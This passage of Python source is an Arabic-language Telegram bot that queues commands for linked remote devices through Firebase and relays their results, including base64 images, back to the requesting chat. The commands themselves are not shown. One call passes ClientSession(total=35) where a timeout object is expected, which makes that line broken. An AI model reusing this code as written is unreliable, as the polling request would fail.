   661→   661→    
   662→   662→    # ─── Unlink Device ────────────────────────────────────────
   663→   663→    elif callback_data.startswith("do_unlink_"):
   664→   664→        device_id = callback_data[len("do_unlink_"):]
   665→   665→        success = await store.unlink_device(device_id, user['id'])
   666→   666→        if success:
   667→   667→            await send_message(chat_id, f"✅ تم فك ربط الجهاز.", reply_markup=main_menu_keyboard(chat_id))
   668→   668→        else:
   669→   669→            await send_message(chat_id, "❌ فشل فك الربط.")
   670→   670→    
   671→   671→    else:
   672→   672→        await send_message(chat_id, "❓ إجراء غير معروف.", reply_markup=main_menu_keyboard(chat_id))
   673→   673→
   674→   674→
   675→   675→# ─── Command Execution ────────────────────────────────────────
   676→   676→
   677→   677→async def execute_device_command(chat_id: str, cmd_key: str, device_id: str, user: dict):
   678→   678→    """Execute a command on a device and track the result for Telegram delivery."""
   679→   679→    cmd_def = COMMAND_REGISTRY.get(cmd_key)
   680→   680→    if not cmd_def:
   681→   681→        await send_message(chat_id, f"❌ الأمر غير معروف: {cmd_key}")
   682→   682→        return
   683→   683→    
   684→   684→    device = store.devices.get(device_id)
   685→   685→    if not device:
   686→   686→        await send_message(chat_id, "❌ الجهاز غير موجود.")
   687→   687→        return
   688→   688→    
   689→   689→    online = store._device_last_online.get(device_id, False)
   690→   690→    if not online:
   691→   691→        await send_message(chat_id, f"⚠️ الجهاز غير متصل حالياً. سيتم تنفيذ الأمر عند الاتصال.")
   692→   692→    
   693→   693→    cmd_name = cmd_def.get('name', cmd_key)
   694→   694→    cmd_icon = cmd_def.get('icon', '🎮')
   695→   695→    actual_cmd = cmd_def['cmd']
   696→   696→    params = cmd_def.get('params', {})
   697→   697→    
   698→   698→    # Queue the command
   699→   699→    queued = await store.queue_command(
   700→   700→        device_id=device_id,
   701→   701→        command=actual_cmd,
   702→   702→        params=params,
   703→   703→        requested_by=user['id'],
   704→   704→        source="telegram"
   705→   705→    )
   706→   706→    
   707→   707→    # Also push to Firebase for real-time delivery
   708→   708→    from .firebase_client import push_command
   709→   709→    if firebase_connected:
   710→   710→        await push_command(device_id, {
   711→   711→            "id": queued['id'],
   712→   712→            "command": actual_cmd,
   713→   713→            "params": params,
   714→   714→            "created_at": queued['created_at'],
   715→   715→        })
   716→   716→    
   717→   717→    # Track for result delivery
   718→   718→    msg = await send_message(chat_id,
   719→   719→        f"{cmd_icon} <b>{cmd_name}</b>\n\n"
   720→   720→        f"📱 الجهاز: {device.get('model', device_id)}\n"
   721→   721→        f"⏳ جاري التنفيذ...",
   722→   722→        reply_markup=inline_keyboard([[("🔙 رجوع", f"dev_{device_id}")]]))
   723→   723→    
   724→   724→    if msg and msg.get('ok') and msg.get('result'):
   725→   725→        store.pending_messages[queued['id']] = {
   726→   726→            "chat_id": chat_id,
   727→   727→            "message_id": msg['result'].get('message_id'),
   728→   728→            "command_id": queued['id'],
   729→   729→            "device_id": device_id,
   730→   730→            "cmd_name": cmd_name,
   731→   731→            "created_at": time.time(),
   732→   732→        }
   733→   733→    
   734→   734→    await store.add_event("command", f"Command queued via Telegram: {cmd_name} -> {device_id}",
   735→   735→                         "info", device_id=device_id, user_id=user['id'])
   736→   736→
   737→   737→
   738→   738→# ─── Result Forwarding ────────────────────────────────────────
   739→   739→
   740→   740→async def forward_result(command_id: str, result_data: any):
   741→   741→    """Forward a command result to the Telegram user who requested it."""
   742→   742→    msg_info = store.pending_messages.pop(command_id, None)
   743→   743→    if not msg_info:
   744→   744→        return
   745→   745→    
   746→   746→    chat_id = msg_info['chat_id']
   747→   747→    device_id = msg_info['device_id']
   748→   748→    cmd_name = msg_info.get('cmd_name', 'Command')
   749→   749→    
   750→   750→    result_str = result_data if isinstance(result_data, str) else json.dumps(result_data, ensure_ascii=False, default=str)
   751→   751→    
   752→   752→    # Check if result is a base64 image
   753→   753→    is_image = isinstance(result_str, str) and len(result_str) > 10000 and result_str.startswith('/9j/')
   754→   754→    
   755→   755→    if is_image:
   756→   756→        try:
   757→   757→            import base64
   758→   758→            img_bytes = base64.b64decode(result_str)
   759→   759→            await send_photo(chat_id, img_bytes, caption=f"📸 {cmd_name}")
   760→   760→        except Exception:
   761→   761→            # If decode fails, send truncated text
   762→   762→            await send_message(chat_id, f"✅ <b>{cmd_name}</b>\n\nنتيجة طويلة جداً لعرضها.")
   763→   763→    elif len(result_str) > 4000:
   764→   764→        await send_message(chat_id, f"✅ <b>{cmd_name}</b>\n\n{result_str[:4000]}...")
   765→   765→    elif result_str:
   766→   766→        await send_message(chat_id, f"✅ <b>{cmd_name}</b>\n\n<code>{result_str}</code>")
   767→   767→    else:
   768→   768→        await send_message(chat_id, f"✅ <b>{cmd_name}</b>\n\nتم التنفيذ بنجاح.")
   769→   769→
   770→   770→
   771→   771→# ─── Polling Loop ─────────────────────────────────────────────
   772→   772→
   773→   773→async def poll_loop():
   774→   774→    """Main Telegram long-polling loop."""
   775→   775→    global tg_offset, polling_active
   776→   776→    polling_active = True
   777→   777→    
   778→   778→    while polling_active:
   779→   779→        try:
   780→   780→            await init_session()
   781→   781→            url = f"{API_BASE}/getUpdates"
   782→   782→            payload = {"offset": tg_offset, "timeout": 30, "allowed_updates": ["message", "callback_query"]}
   783→   783→            
   784→   784→            async with _tg_session.post(url, json=payload, timeout=ClientSession(total=35)) as resp:
   785→   785→                data = await resp.json()
   786→   786→            
   787→   787→            if not data.get('ok'):
   788→   788→                await asyncio.sleep(5)
   789→   789→                continue
   790→   790→            
   791→   791→            for update in data.get('result', []):
   792→   792→                update_id = update.get('update_id', 0)
   793→   793→                if update_id >= tg_offset:
   794→   794→                    tg_offset = update_id + 1
   795→   795→                
   796→   796→                # Dedup
   797→   797→                if update_id in store._tg_processed_updates:
   798→   798→                    continue
   799→   799→                store._tg_processed_updates.add(update_id)
   800→   800→                if len(store._tg_processed_updates) > 500:
   801→   801→                    store._tg_processed_updates = set(list(store._tg_processed_updates)[-250:])
   802→   802→                
   803→   803→                # Process message
   804→   804→                if 'message' in update:
   805→   805→                    msg = update['message']
   806→   806→                    chat_id = msg.get('chat', {}).get('id')
   807→   807→                    text = msg.get('text', '')
   808→   808→                    message_id = msg.get('message_id', 0)
   809→   809→                    from_user = msg.get('from', {})
   810→   810→                    if text:
   811→   811→                        await handle_message(chat_id, text, message_id, from_user)
   812→   812→                
   813→   813→                # Process callback query
   814→   814→                elif 'callback_query' in update:
   815→   815→                    cb = update['callback_query']
   816→   816→                    chat_id = cb.get('message', {}).get('chat', {}).get('id')
   817→   817→                    callback_data = cb.get('data', '')
   818→   818→                    cb_id = cb.get('id', '')
   819→   819→                    if callback_data:
   820→   820→                        await handle_callback(chat_id, callback_data, cb_id)
   821→   821→        
   822→   822→        except asyncio.CancelledError:
   823→   823→            break
   824→   824→        except Exception as e:
   825→   825→            logger.error(f"TG poll error: {e}")
   826→   826→            await asyncio.sleep(5)
   827→   827→
   828→   828→
   829→   829→async def start_bot():
   830→   830→    """Start the Telegram bot polling."""
   831→   831→    # Set bot commands
   832→   832→    await api_call("setMyCommands", {
   833→   833→        "commands": [
   834→   834→            {"command": "start", "description": "القائمة الرئيسية"},
   835→   835→            {"command": "help", "description": "قائمة الأوامر"},
   836→   836→            {"command": "devices", "description": "قائمة الأجهزة"},
   837→   837→            {"command": "link", "description": "إنشاء كود ربط"},
   838→   838→            {"command": "status", "description": "حالة الخادم"},
   839→   839→            {"command": "stats", "description": "الإحصائيات"},
   840→   840→            {"command": "logs", "description": "آخر السجلات"},
   841→   841→            {"command": "settings", "description": "الإعدادات"},
   842→   842→        ]
   843→   843→    })
   844→   844→    asyncio.create_task(poll_loop())
   845→   845→    logger.info("Telegram bot started")